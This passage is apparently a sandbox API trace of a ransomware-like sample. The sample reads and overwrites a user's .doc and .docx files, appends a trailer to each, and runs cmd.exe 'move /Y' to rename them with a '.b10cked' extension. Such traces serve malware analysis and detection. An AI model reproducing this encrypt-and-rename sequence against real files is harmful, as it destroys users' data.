lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.131] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19192063419) returned 1 [0135.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xfdf8 [0135.133] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x102e0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x102e0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.134] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x816f, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x816f, lpOverlapped=0x0) returned 1 [0135.135] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.135] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x816f, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x816f, lpOverlapped=0x0) returned 1 [0135.135] SetFilePointer (in: hFile=0x114, lDistanceToMove=-33135, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8171 [0135.135] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x816f, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x816f, lpOverlapped=0x0) returned 1 [0135.135] SetFilePointer (in: hFile=0x114, lDistanceToMove=-33135, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8171 [0135.135] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x816f, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x816f, lpOverlapped=0x0) returned 1 [0135.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qXDEHmzN LrwSQhutJ.docx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0135.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qXDEHmzN LrwSQhutJ.docx", cchWideChar=23, lpMultiByteStr=0x1328834, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qXDEHmzN LrwSQhutJ.docx", lpUsedDefaultChar=0x0) returned 23 [0135.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x102e0 [0135.139] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0135.139] CloseHandle (hObject=0x114) returned 1 [0135.140] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\qXDEHmzN LrwSQhutJ.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC") returned 0x26 [0135.141] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0135.141] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xbe8, dwThreadId=0xc04)) returned 1 [0135.150] CloseHandle (hObject=0x110) returned 1 [0135.150] CloseHandle (hObject=0x114) returned 1 [0135.150] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.150] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.150] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0135.150] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.150] ReleaseMutex (hMutex=0xf8) returned 1 [0135.150] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.150] ReleaseMutex (hMutex=0xf8) returned 1 [0135.150] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.150] ReleaseMutex (hMutex=0xf8) returned 1 [0135.150] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.150] ReleaseMutex (hMutex=0xf8) returned 1 [0135.150] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0135.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.150] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19193963222) returned 1 [0135.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.152] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.152] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.152] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.152] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x148fc [0135.231] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0135.232] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14de4 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14de4 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.233] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa6f1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa6f1, lpOverlapped=0x0) returned 1 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.233] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa6f1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa6f1, lpOverlapped=0x0) returned 1 [0135.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42737, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa6f3 [0135.234] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa6f1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa6f1, lpOverlapped=0x0) returned 1 [0135.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42737, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa6f3 [0135.234] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa6f1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa6f1, lpOverlapped=0x0) returned 1 [0135.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="92pj.doc", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="92pj.doc", cchWideChar=8, lpMultiByteStr=0x131322c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="92pj.doc", lpUsedDefaultChar=0x0) returned 8 [0135.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14de4 [0135.238] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0135.238] CloseHandle (hObject=0x114) returned 1 [0135.239] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc") returned 0x35 [0135.239] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\") returned 0x2d [0135.240] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xa18, dwThreadId=0xa0c)) returned 1 [0135.281] CloseHandle (hObject=0x110) returned 1 [0135.281] CloseHandle (hObject=0x114) returned 1 [0135.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: 